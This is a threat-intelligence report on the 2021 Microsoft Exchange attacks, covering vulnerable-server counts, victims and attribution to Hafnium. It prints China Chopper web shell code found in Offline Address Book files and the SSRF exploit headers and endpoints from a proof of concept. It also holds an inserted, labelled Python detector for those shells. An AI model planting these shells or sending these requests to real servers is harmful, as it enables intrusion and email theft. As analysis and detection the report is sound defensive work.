Microsoft Exchange Attack Surface Was Smaller and More Targeted Than Previously Thought

Ryan Sherstobitoff
03/15/2021

Updated December 24, 2021.

Executive Summary

Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.


Although the attack was initially thought to have affected as many as 30,000-100,000 organizations, our analysis indicates that the number is far lower. Using our proprietary technology to scan the internet for vulnerable, public-facing Microsoft Exchange servers, we found 2,500-18,000 vulnerable public-facing servers worldwide, the majority of them in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality by the perpetrators.

While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021, failure to install the necessary patch has left over 2,500 servers still vulnerable.

Other published assessments of the attack have concluded, based on open source information, that the primary adversary is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers; however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.

Background

A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day (previously unknown) vulnerabilities that enabled the attackers to execute code remotely and manipulate the victim’s systems.

The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify any potential victims.

Key Findings

Updated December 24, 2021

  • Discovery of ‘in the wild’ exploit code written by Chinese-speaking authors on GitHub. These exploits give the attacker the ability to dump the email contents of the Exchange server.
  • Despite early reports of 30,000-100,000 victims, we were only able to observe approximately 18,000 public-facing vulnerable servers, including instances of Outlook Web Access that are usually linked to internal Exchange servers. We are unable to explain the discrepancy without knowing more about the data upon which the original reporting relied.
  • While the majority of vulnerable servers were found in Europe, the Middle East, and Africa, the majority of victims were found in the United States, with a similar number in Germany.
  • We were able to identify 302 compromised organizations in at least 10 different industry sectors. We managed to deduce the identity of 173 organizations. As a matter of policy, we do not name victims of attacks.
  • We found evidence that may indicate more than one attacker at work in the victims’ systems, as it appears other threat actors are rushing to exploit the vulnerabilities.

Vulnerability Analysis

The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065 & CVE-2021-26855. These vulnerabilities are part of an exploitation chain that, when executed successfully in succession, allows the attacker to achieve remote code execution on the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.

In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of the exploits for these vulnerabilities, and found evidence that proof of concept code had been developed for them.

Exploit Code Discovery

During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.

Fig 1. Twitter posting (note screenshots have Chinese characters in them).

This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.

Fig 1.2 GitHub account belonging to the author of the email-dumping proof of concept

Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down; however, other GitHub accounts refer to GreyOrder as the original author. Although the original post by GreyOrder had been deleted, we were able to recover it through a cached reference to the post.

Fig 1.3 CVEBase

Fig 1.4 POC discussion on GitHub

The following is what GreyOrder posted on March 3, 2021, before it was later removed from the repositories.

Fig 1.5 Original GitHub posting for GreyOrder POC exploit

GreyOrder discloses some of the conditions to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. In order to trigger the vulnerability, a few conditions have to exist.

  • The targeted Microsoft Exchange server must be a load balancing server (two or more servers must be used at the same time).
  • The FQDN of the targeted internal Microsoft Exchange server must be known. It can be captured via an NTLM type 2 message.
  • For email content retrieval, the target email address must be known. Email addresses can be directly enumerated.

The general behavior of this proof of concept exploit code is outlined below.

  • The script first checks whether the server is vulnerable in the same way that Microsoft’s nmap script does, by sending a request to https:///owa/auth/x.js with the following header:
    • Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
  • It then obtains the FQDN by sending an NTLM type 2 message to https:///ews/exchange.asmx.
  • Finally, it sends XML SOAP requests to https:///ecp/temp.js with the following headers:
    • Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml

Fig 1.6 Proof of Concept Exploit Demonstration

We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.

Fig 1.7 GreyOrder GitHub

Scope and Impact

The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many on-premise Exchange servers are actually exposed, given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis follow.

  • What is the total population of exposed Microsoft Exchange servers, regardless of version, on the Internet during the period of analysis? This enables us to make a general assessment of the potential attack surface.
    • Microsoft released a detection script (to our collective benefit) for identifying vulnerable on-prem Microsoft Exchange servers, but then updated that script twice: first adding the ability to detect Exchange 2013 installations, and later handling service redirects (HTTP response codes 301 and 302) better after receiving feedback that the scanning results contained false negatives.
  • From our analysis and scans, we believe significantly fewer than 30,000 organizations were affected. Our data shows 18,000 organizations may have been vulnerable to this attack. To date, we have been able to identify 302 unique organizations that were impacted.
  • How many Microsoft Exchange servers still remain unpatched against CVE-2021-26855? First, we should clarify that we are only able to detect servers that are vulnerable to the Server Side Request Forgery (SSRF) vulnerability; the other vulnerabilities depend on this CVE being successfully exploited to execute arbitrary code. We believe that, as of March 15, 2021, over 2,500 servers are still vulnerable.

What did we see?

Threat Actor

The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.

Attack Surface

Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that the majority are in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as still vulnerable or unpatched. Through our research and analysis we found fewer than 18,000 vulnerable public-facing servers worldwide.

Discrepancy in Vulnerable Server numbers

We can’t definitively say what drove the initial reports of significantly more organizations being hacked. They may be based on internal Microsoft telemetry of Exchange servers sold, or they may include servers behind a firewall which we would not be able to observe. Our numbers represent the Exchange servers that we observed from the Internet, which is fewer than 18,000. Without additional information about the data upon which those reports were based, we can only speculate as to the discrepancy. As our research continues we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.

Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)

Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)

Malware Involved

During our investigations, we focused on some of the technical aspects of the attacks, such as the malware involved. We detected several malware files known as web shells related to this attack that were tagged as exploiting CVE-2021-26855 & CVE-2021-27065, i.e. the web shells were specifically designed to be used with these vulnerabilities.

China Chopper

The adversary used the China Chopper web shell in this targeted attack.

The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a graphical user interface that communicates with the server-side component. Other web shells present an HTML interface on the compromised server, so the attacker can interact with them simply by visiting the page; the China Chopper server-side component shows no content, so the attacker must use the client-side component to interact with it. The client-side component provides the following capabilities on the affected server:

  • file management
  • database management
  • virtual terminal

The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.

The first type is injected in the ExternalUrl field of the OAB (Offline Address Book) files. It checks whether any files were uploaded with the request and, if so, saves the first one locally as an independent ASPX file.

The following example has a hardcoded ASPX file name:

  • ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("<aspx_file_name>"));}}</script>

We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:

  • ExternalUrl: http://g/<script runat="server">protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form["p"], false, Encoding.Default);sw.Write(Request.Form["f"]);sw.Close();}</script>

The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.

The second type is also injected in the ExternalUrl field of the OAB files, but the injected content is different. It reads the value of an HTTP parameter and executes it on the server. An example of such a web shell is:

  • http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["<parameter_name>"],"unsafe");}</script>

Since the attacker chooses the value for <aspx_file_name> in the first case and <parameter_name> in the second case, it is possible that these different approaches may indicate the presence of two different attackers.

As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.

Since the web shell was injected into the OAB files which are configuration files containing information about the servers they are running on, we managed to obtain the list of domains for the infected servers. Some of them are local domains while others are public.

The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:

Fig 2 – Distribution of ChinaChopper web shell parameters

Apart from these, we observed two clusters of similar-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server. We observed that each of these parameter names was used only once. The first cluster has parameter values that look like these: rxDg52fHL9GW, WHotfJjxFadX, EiH4yV2WGYgc; the second cluster looks like: 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, ce62a4a53e118ff82150522c663ddae6.
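As an added example (not code from the original post or from SecurityScorecard), the following Python script turns the two injected-ExternalUrl patterns described above into a detection rule: it flags any OAB ExternalUrl that carries a server-side script tag, classifies it as a file-drop or eval-parameter shell, extracts the dropped file name or parameter name, and buckets parameter names into the two clusters noted above. It assumes the values were exported from the Exchange OAB virtual directory configuration (for instance Get-OabVirtualDirectory output); the sample values below are constructed for the example, modelled on the entries quoted in the post.

```python
import re
from collections import Counter

# Constructed sample ExternalUrl values (assumption: exported from
# Get-OabVirtualDirectory). The injected ones mirror the shapes quoted in
# the post; the host names and parameter values are made up for the example.
SAMPLE_EXTERNAL_URLS = [
    # Benign: a normal OAB URL carries no script tag at all.
    "https://mail.example.test/OAB",
    # Type 1: saves an uploaded file under a hard-coded ASPX name.
    'http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e)'
    '{if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>',
    # Type 1 variant: file name and content arrive as two form parameters.
    'http://g/<script runat="server">protected void Page_Load(object sender, EventArgs e)'
    '{System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form["p"], false, Encoding.Default);'
    'sw.Write(Request.Form["f"]);sw.Close();}</script>',
    # Type 2: evaluates the value of one HTTP parameter on the server.
    'http://f/<script language="JScript" runat="server">function Page_Load()'
    '{eval(Request["rxDg52fHL9GW"],"unsafe");}</script>',
    'http://f/<script language="JScript" runat="server">function Page_Load()'
    '{eval(Request["26c7d6bd63f345f9fea2797a57c1ac33"],"unsafe");}</script>',
]

# Any ExternalUrl containing a server-side script tag has been tampered with.
INJECTED_RE = re.compile(r'<script[^>]*runat\s*=\s*["\']?server', re.IGNORECASE)
# Type 2: eval(Request["<parameter_name>"], "unsafe")
EVAL_RE = re.compile(r'eval\(\s*Request\[\s*["\']([^"\']+)["\']\s*\]', re.IGNORECASE)
# Type 1: Request.Files[0].SaveAs(Server.MapPath("<aspx_file_name>"))
SAVEAS_RE = re.compile(r'SaveAs\(\s*Server\.MapPath\(\s*["\']([^"\']+)["\']\s*\)', re.IGNORECASE)
# Type 1 variant: StreamWriter(Request.Form["<name>"] ...) ... Write(Request.Form["<content>"])
STREAMWRITER_RE = re.compile(
    r'StreamWriter\(\s*Request\.Form\[\s*["\']([^"\']+)["\']\s*\].*?'
    r'Write\(\s*Request\.Form\[\s*["\']([^"\']+)["\']\s*\]',
    re.IGNORECASE | re.DOTALL,
)

# The two parameter-name clusters the post describes: 32 lowercase hex
# characters versus 12 mixed-case alphanumerics.
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")
ALNUM12_RE = re.compile(r"^[A-Za-z0-9]{12}$")


def parameter_cluster(name):
    """Bucket an eval-parameter name into one of the observed clusters."""
    if HEX32_RE.match(name):
        return "hex32"
    if ALNUM12_RE.match(name):
        return "alnum12"
    return "other"


def classify_external_url(url):
    """Describe whether and how a single ExternalUrl value has been weaponised."""
    result = {"injected": False, "kind": "benign", "artifact": None, "cluster": None}
    if not INJECTED_RE.search(url):
        return result
    result["injected"] = True
    m = EVAL_RE.search(url)
    if m:
        name = m.group(1)
        result.update(kind="eval-parameter", artifact=name, cluster=parameter_cluster(name))
        return result
    m = SAVEAS_RE.search(url)
    if m:
        result.update(kind="file-drop-fixed", artifact=m.group(1))
        return result
    m = STREAMWRITER_RE.search(url)
    if m:
        result.update(kind="file-drop-parameterised", artifact="name=%s,content=%s" % m.groups())
        return result
    # A script tag we could not match to a known shape still deserves triage.
    result["kind"] = "unknown-script"
    return result


def summarize(urls):
    """Tally findings by kind across a set of exported ExternalUrl values."""
    return Counter(classify_external_url(u)["kind"] for u in urls)


if __name__ == "__main__":
    for u in SAMPLE_EXTERNAL_URLS:
        print(classify_external_url(u))
    print(summarize(SAMPLE_EXTERNAL_URLS))
```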

A full example of an infected OAB file from an infected Microsoft Exchange server follows:

Full OAB file

Victimology

One objective of the analysis was to understand the victimology of this attack and determine if it aligns with a typical nation-state cyber offensive operation. We started with analyzing the discovered web shells and their capabilities, then we focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack.

The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with a last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files.

Additional research into the web shell dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerable servers were predominantly in EMEA.

Fig 2.1 Distribution of web shell Victims

While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.

Fig 2.2 Sector Victimology

We found cases in which the domains for the URLs specified in the OAB files are local and we wonder whether this means that there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.

Other web shells

In addition to China Chopper, we discovered other web shell code designed to check if products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on which condition is true [see below: “if..fireeye…write 1”, “if..confer (CarbonBlack)…write 2”, “if…crowdstrike…write 3”]. We believe the attacker is likely collecting this information in an effort to understand the victim’s environment. This web shell would allow additional malware to be deployed to terminate the security software.

Web shell sample hash: 0ba9a76f55aaa495670d74d21850d0155ff5d6a5

The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.

Analysis of Competing Hypotheses

The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. For each of several hypotheses, we list the evidence that supports it and the evidence that argues against it.

Hypotheses, with the evidence that supports and the evidence that disproves each:

Hypothesis 1: 30,000 to 100,000 Microsoft Exchange servers are compromised

  Evidence that supports: (none listed)

  Evidence that disproves:
  • Discovery of 302 unique victims
  • Total population of on-premise vulnerable Microsoft Exchange servers exposed to the internet is less than 18,000
  • Media articles do not provide direct verifiable evidence that supports the exact number of victims or the exact number of vulnerable organizations

Hypothesis 2: GreyOrder is a member of Hafnium

  Evidence that supports:
  • Chinese speaking
  • Minimal activity on GitHub
  • Directly involved in the development of proof of concept RCE exploit code related to this attack

  Evidence that disproves:
  • No direct attribution to specific attacks
  • No direct history of malicious activity

Hypothesis 3: Techniques, Tactics & Procedures support a nation-state cyber offensive operation

  Evidence that supports:
  • Low number of discovered victims
  • Public reporting supports Hafnium being the initial threat actor
  • Number of vulnerable servers is less than 18,000
  • Usage of 0-days (indicating sophistication)
  • Most infections are in Germany and the US, while most vulnerable servers are located in Europe, the Middle East, and Africa (EMEA)

  Evidence that disproves: (none listed)

Conclusion

While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of the related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may currently be exploited by ransomware criminals, we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.
